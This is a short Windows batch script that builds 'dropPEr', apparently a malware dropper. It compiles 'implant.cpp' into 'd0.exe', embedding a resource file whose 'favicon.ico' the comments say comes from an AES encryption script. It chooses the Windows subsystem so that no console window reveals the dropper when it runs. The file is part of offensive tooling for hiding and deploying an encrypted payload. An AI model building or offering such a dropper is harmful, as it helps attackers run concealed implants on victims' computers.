@ECHO OFF
:: Compile `dropPEr` - this script expects x64 Native Tools Command Prompt for VS.
:: Note: the required `favicon.ico` file is generated by `aesencrypt.py`, and so
:: you must run that script first. See `aesencrypt.py` for more information.


:: Compile the `.rc` file into `.res` file.
rc resource.rc

:: Convert the `.res` file into `.o` file.
cvtres /MACHINE:x64 /OUT:resource.o resource.res

:: Compile and link `dropPEr`.
:: `/SUBSYSTEM:WINDOWS` complements the use of `WinMain` in `implant.cpp`
:: to prevent any console windows from appearing when the dropper is executed.
::cl.exe /nologo /Ox /MT /W0 /GS- /DNDEBUG /Tcimplant.cpp /link /OUT:d0.exe /SUBSYSTEM:WINDOWS /MACHINE:x64 resource.o
:: Debug build.
cl.exe /nologo /MT /Zi /Od /Tcimplant.cpp /link /DEBUG /OUT:d0.exe /SUBSYSTEM:WINDOWS /MACHINE:x64 resource.o
